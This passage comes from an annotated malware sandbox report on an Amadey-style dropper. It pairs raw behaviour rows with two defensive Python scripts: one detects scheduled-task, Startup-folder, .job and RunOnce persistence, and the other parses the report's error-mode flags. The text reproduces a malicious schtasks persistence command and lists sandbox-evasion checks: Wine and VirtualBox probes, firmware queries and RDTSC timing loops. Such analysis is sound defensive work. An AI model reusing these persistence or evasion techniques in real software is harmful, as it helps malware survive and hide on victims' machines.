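The persistence chain above is a good shape for detection logic: a scheduled task whose action is wscript running a .js under AppData every five minutes, a .url in the per-user Startup folder, a legacy .job written directly into C:\Windows\Tasks, and the RunOnce writes. The script below is an added example for this page, not part of the Joe Sandbox report or any vendor product. Its events are constructed to mirror the report lines above, plus one benign control, rather than captured telemetry, and the field names (type, image, cmdline, path, key, value) are an assumed normalized schema, not any specific EDR's. It also encodes the caveat from the RunOnce lines: RunOnce\wextract_cleanupN is what the IExpress/wextract self-extractor writes to remove its IXP*.TMP directory, so on its own it says "SFX dropper", not "persistence".

```python
"""Detection logic for the persistence chain above, run over constructed events.
Added example, not Joe Sandbox or vendor code; the event schema is assumed."""
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "rundll32.exe",
                "regsvr32.exe", "cmd.exe"}
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Users\\Public)\\", re.I)
STARTUP_DIR = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?$", re.I)


def tokenize(cmdline: str) -> list:
    """Split a Windows command line on whitespace, keeping "double-quoted" arguments whole."""
    return [q or bare for q, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def basename(path: str) -> str:
    """Lower-cased file name with .exe normalised, e.g. 'wscript' -> 'wscript.exe'."""
    name = path.lower().rsplit("\\", 1)[-1]
    return name if name.endswith(".exe") else name + ".exe"


def parse_schtasks(cmdline: str) -> dict:
    """schtasks /create /tn X /tr Y /sc minute /mo 5 /F -> {'create': True, 'tn': X, ...}."""
    toks, opts, i = tokenize(cmdline), {}, 1
    while i < len(toks):
        key = toks[i].lstrip("/").lower()
        if i + 1 < len(toks) and not toks[i + 1].startswith("/"):
            opts[key], i = toks[i + 1], i + 2          # switch with a value
        else:
            opts[key], i = True, i + 1                 # bare switch such as /create or /F
    return opts


def check_event(ev: dict) -> list:
    """Reasons an event looks like persistence; an empty list means nothing matched."""
    reasons, image = [], ev["image"].lower()
    if ev["type"] == "process":
        first = (tokenize(ev.get("cmdline", "")) or [""])[0]
        o = parse_schtasks(ev["cmdline"]) if basename(first) == "schtasks.exe" else {}
        if o.get("create") and isinstance(o.get("tr"), str):
            host, tn = basename(tokenize(o["tr"])[0]), o.get("tn")
            if host in SCRIPT_HOSTS:
                reasons.append(f"task {tn!r} runs a script host ({host}) instead of a program")
            if USER_WRITABLE.search(o["tr"]):
                reasons.append(f"task {tn!r} action lives in a user-writable directory")
            mo = str(o.get("mo", "1"))
            if str(o.get("sc", "")).lower() == "minute" and mo.isdigit() and int(mo) <= 10:
                reasons.append(f"task {tn!r} re-launches every {mo} minute(s) (watchdog)")
    elif ev["type"] == "file":
        path = ev["path"].lower()
        if STARTUP_DIR.search(path):
            reasons.append("file dropped into the per-user Startup folder")
        if path.startswith("c:\\windows\\tasks\\") and path.endswith(".job") \
                and not image.startswith("c:\\windows\\"):
            reasons.append("legacy .job task written by a process outside C:\\Windows")
    elif ev["type"] == "registry" and RUN_KEY.search(ev["key"]):
        if re.fullmatch(r"wextract_cleanup\d+", ev["value"]):
            # IExpress/wextract writes this to delete its IXP*.TMP directory: evidence of an
            # SFX dropper, not persistence by itself, so it is reported at low confidence.
            reasons.append("RunOnce wextract_cleanupN: IExpress self-extractor cleanup (SFX dropper)")
        elif not image.startswith("c:\\windows\\"):
            reasons.append("Run/RunOnce value written by a process outside C:\\Windows")
    return reasons


def scan(events) -> dict:
    """Event index -> reasons, for the events that matched at least one rule."""
    return {i: r for i, ev in enumerate(events) if (r := check_event(ev))}


# Constructed events mirroring the report lines above, plus one benign control (index 4).
SAMPLE_EVENTS = [
    {"type": "process", "image": "C:\\Windows\\SysWOW64\\schtasks.exe",
     "cmdline": "schtasks.exe /create /tn \"Coast\" /tr \"wscript //B 'C:\\Users\\user\\AppData"
                "\\Local\\TradeSecure Innovations\\TradeHub.js'\" /sc minute /mo 5 /F"},
    {"type": "file", "image": "C:\\Windows\\SysWOW64\\cmd.exe",
     "path": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\TradeHub.url"},
    {"type": "registry", "image": "C:\\Users\\user\\Desktop\\mQRr8Rkorf.exe",
     "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce",
     "value": "wextract_cleanup0"},
    {"type": "file", "image": "C:\\Users\\user\\AppData\\Local\\Temp\\IXP001.TMP\\1E08u3.exe",
     "path": "C:\\Windows\\Tasks\\rapes.job"},
    {"type": "process", "image": "C:\\Windows\\System32\\schtasks.exe",
     "cmdline": "schtasks.exe /create /tn \"Updater\" /tr \"C:\\Vendor\\update.exe\" /sc daily /st 03:00"},
]

if __name__ == "__main__":
    for i, reasons in scan(SAMPLE_EVENTS).items():
        print(i, SAMPLE_EVENTS[i]["image"], reasons)
```

The task rule fires on three independent properties of the same command line (script host, user-writable action path, minute-level interval), which is what separates the Amadey-style watchdog task from a vendor updater that runs a signed binary from Program Files once a day. The benign control at index 4 matches none of them.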

                              Hooking and other Techniques for Hiding and Protection

                               Source: C:\Windows\SysWOW64\cmd.exe | Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\HAN (extensionless DLL dropped to %TEMP% by the same cmd.exe; see the File created and checksum entries for han above)
                               Source: C:\Windows\SysWOW64\cmd.exe | Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\UVWNWEBBOKSG
                               Source: C:\Users\user\Desktop\mQRr8Rkorf.exe | Process information set: NOOPENFILEERRORBOX (SetErrorMode(SEM_NOOPENFILEERRORBOX): suppresses the dialog Windows shows when a file cannot be found, so a broken stage fails silently instead of alerting the user; repeated by every stage below)
                               Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe | Process information set: NOOPENFILEERRORBOX
                               Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe | Process information set: NOOPENFILEERRORBOX
                               Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process information set: NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeProcess information set: NOOPENFILEERRORBOX (×4)
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX (×6)
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess information set: NOOPENFILEERRORBOX (×5)
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeProcess information set: NOOPENFILEERRORBOX (×3)
                              Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX (×4)
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeProcess information set: NOOPENFILEERRORBOX (×3)
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeProcess information set: NOOPENFILEERRORBOX (×15)
                              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX (×2)
                              Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX (×2)
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comProcess information set: NOOPENFILEERRORBOX (×2)
                              Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exeProcess information set: NOOPENFILEERRORBOX (×3)
                              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX (×2)
                              Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comProcess information set: NOOPENFILEERRORBOX (×2)
                              Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeProcess information set: NOOPENFILEERRORBOX (×23)
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (×5)
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX (×54)
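Every row in this report has the same shape: a source path fused to the signature name, a colon, the observed value, and on some rows the "Jump to behavior" link text. The Python below is an added example, not part of the Joe Sandbox report or its tooling. It parses constructed rows copied from this report, collapses the repeated rows into per-process hit counts, and folds the "Process information set" flag names back into the numeric mask the process passed to SetErrorMode (the SEM_* values are the winbase.h constants). Function names such as parse_row and summarize are this example's own.

```python
import re
from collections import Counter, defaultdict

# SetErrorMode() flag values from winbase.h; the report prints the names
# without their SEM_ prefix and joins several with " | ".
SEM_FLAGS = {
    "FAILCRITICALERRORS": 0x0001,
    "NOGPFAULTERRORBOX": 0x0002,
    "NOALIGNMENTFAULTEXCEPT": 0x0004,
    "NOOPENFILEERRORBOX": 0x8000,
}

# One report row: "Source: <path><Signature name>: <value>[Jump to behavior]".
# The extracted text fuses the path to the signature name, so the path is cut
# at its file extension and the signature name runs up to the first colon.
ROW_RE = re.compile(
    r"^\s*Source:\s*(?P<source>.+?\.(?:exe|com|dll|scr))"
    r"(?P<signature>[A-Z][A-Za-z/ ]*?):\s*"
    r"(?P<value>.*?)(?:Jump to behavior)?\s*$"
)

# Constructed sample: rows copied from this report, including duplicated
# A7B94.exe rows, multi-flag rows and two rows from the evasion section.
SAMPLE_ROWS = r"""
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\10111840101\HmngBpR.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\353090\Seat.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
""".strip().splitlines()


def parse_row(row):
    """Split one row into (source path, signature name, value); None if it is not a row."""
    m = ROW_RE.match(row)
    if not m:
        return None
    return m.group("source"), m.group("signature"), m.group("value")


def error_mode_mask(value):
    """Fold 'A | B | C' flag names back into the numeric SetErrorMode argument."""
    mask = 0
    for name in value.split("|"):
        mask |= SEM_FLAGS[name.strip()]  # KeyError on a name this table lacks
    return mask


def decode_error_mode(mask):
    """Inverse of error_mode_mask, with the SEM_ prefix restored."""
    return [f"SEM_{name}" for name, bit in SEM_FLAGS.items() if mask & bit]


def summarize(rows):
    """Per-process Counter of distinct (signature, value) pairs and how often each hit."""
    per_process = defaultdict(Counter)
    for row in rows:
        parsed = parse_row(row)
        if parsed is None:
            continue
        source, signature, value = parsed
        per_process[source][(signature, value)] += 1
    return per_process


def error_modes_by_process(per_process):
    """Union of every SetErrorMode mask each process was observed setting."""
    masks = {}
    for source, hits in per_process.items():
        mask = 0
        for signature, value in hits:
            if signature == "Process information set":
                mask |= error_mode_mask(value)
        if mask:
            masks[source] = mask
    return masks


if __name__ == "__main__":
    summary = summarize(SAMPLE_ROWS)
    for source, hits in summary.items():
        name = source.rsplit("\\", 1)[-1]
        for (signature, value), n in hits.items():
            print(f"{name:12} {signature}: {value} (x{n})")
    for source, mask in error_modes_by_process(summary).items():
        name = source.rsplit("\\", 1)[-1]
        print(f"{name:12} SetErrorMode(0x{mask:04X}) = {' | '.join(decode_error_mode(mask))}")
```

The per-process mask is useful for grouping, not as a verdict: SEM_NOOPENFILEERRORBOX on its own is set by plenty of legitimate software, and the report shows WerFault.exe itself setting FAILCRITICALERRORS | NOGPFAULTERRORBOX, so the flag combination alone does not separate the payloads from the crash reporter they triggered. The rows that carry weight are the ones in the evasion section below, where the same parser yields the process-to-technique pairs directly.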

                              Malware Analysis System Evasion

                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeSystem information queried: FirmwareTableInformation
                              Source: C:\Windows\SysWOW64\explorer.exeSystem information queried: FirmwareTableInformation
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeSystem information queried: FirmwareTableInformation
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeAPI/Special instruction interceptor: Address: 6C679364
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeAPI/Special instruction interceptor: Address: 6C679364
                              Source: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exeAPI/Special instruction interceptor: Address: 6C679065
                              Source: C:\Windows\SysWOW64\cmd.exeAPI/Special instruction interceptor: Address: 6C673B54
                              Source: C:\Windows\SysWOW64\explorer.exeAPI/Special instruction interceptor: Address: 27A317
                              Source: C:\Windows\SysWOW64\explorer.exeAPI/Special instruction interceptor: Address: 32B1145
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_CURRENT_USER\Software\Wine (×3)
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ (×3)
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 50310B second address: 50310F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 50310F second address: 503114 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 67B114 second address: 67B11A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 67B11A second address: 67B11E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 68A3CA second address: 68A3D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 68A3D5 second address: 68A3DD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 68A3DD second address: 68A3E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jg 00007FD3A47FEE86h 0x0000000c rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 68A845 second address: 68A866 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CBA7h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 68A866 second address: 68A86A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 68A86A second address: 68A86E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 68A86E second address: 68A877 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 68A877 second address: 68A87D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 68D35A second address: 68D3A2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD3A47FEE86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c call 00007FD3A47FEE93h 0x00000011 mov dx, ax 0x00000014 pop ecx 0x00000015 push 00000000h 0x00000017 mov ecx, dword ptr [ebp+122D19F3h] 0x0000001d clc 0x0000001e call 00007FD3A47FEE89h 0x00000023 pushad 0x00000024 jmp 00007FD3A47FEE8Eh 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 68D3A2 second address: 68D3B8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD3A4D6CB96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007FD3A4D6CB98h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 68D3B8 second address: 68D3FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007FD3A47FEE96h 0x00000012 mov eax, dword ptr [eax] 0x00000014 push ecx 0x00000015 push esi 0x00000016 push eax 0x00000017 pop eax 0x00000018 pop esi 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FD3A47FEE8Bh 0x00000025 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 68D3FF second address: 68D405 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 68D405 second address: 68D409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 68D546 second address: 68D56F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD3A4D6CB98h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push edx 0x00000011 pop edx 0x00000012 jmp 00007FD3A4D6CBA6h 0x00000017 popad 0x00000018 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 68D56F second address: 68D575 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 68D575 second address: 68D579 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 68D579 second address: 68D58B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 68D58B second address: 68D58F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 68D58F second address: 68D595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 68D595 second address: 68D5C7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnl 00007FD3A4D6CB96h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push edi 0x0000000f jmp 00007FD3A4D6CBA8h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 68D5C7 second address: 68D5CD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 68D5CD second address: 68D676 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FD3A4D6CB9Bh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c call 00007FD3A4D6CBA9h 0x00000011 jmp 00007FD3A4D6CBA9h 0x00000016 pop edi 0x00000017 push 00000003h 0x00000019 jmp 00007FD3A4D6CB9Fh 0x0000001e push 00000000h 0x00000020 mov si, 822Ch 0x00000024 push 00000003h 0x00000026 or dword ptr [ebp+122D228Ah], ecx 0x0000002c call 00007FD3A4D6CB99h 0x00000031 jmp 00007FD3A4D6CBA7h 0x00000036 push eax 0x00000037 push ebx 0x00000038 jmp 00007FD3A4D6CBA5h 0x0000003d pop ebx 0x0000003e mov eax, dword ptr [esp+04h] 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 jng 00007FD3A4D6CB96h 0x0000004b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 68D676 second address: 68D692 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE95h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 68D692 second address: 68D69F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 68D69F second address: 68D6E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD3A47FEE8Eh 0x0000000b popad 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jmp 00007FD3A47FEE8Fh 0x00000015 pop eax 0x00000016 je 00007FD3A47FEE8Eh 0x0000001c pushad 0x0000001d sub dword ptr [ebp+122D1C0Eh], esi 0x00000023 popad 0x00000024 lea ebx, dword ptr [ebp+1245E25Fh] 0x0000002a mov esi, dword ptr [ebp+122D3801h] 0x00000030 push eax 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 67CC22 second address: 67CC2E instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD3A4D6CB96h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 67CC2E second address: 67CC34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6ABD5C second address: 6ABD80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CBA1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push edx 0x0000000d jnp 00007FD3A4D6CB98h 0x00000013 push eax 0x00000014 pop eax 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6ABFCF second address: 6ABFD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6ABFD5 second address: 6ABFD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6ABFD9 second address: 6ABFDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6ABFDF second address: 6AC006 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD3A4D6CBA6h 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007FD3A4D6CB96h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6AC006 second address: 6AC01C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD3A47FEE90h 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6AC5BB second address: 6AC5C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exe RDTSC instruction interceptor: First address: 6AC5C1 second address: 6AC5C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
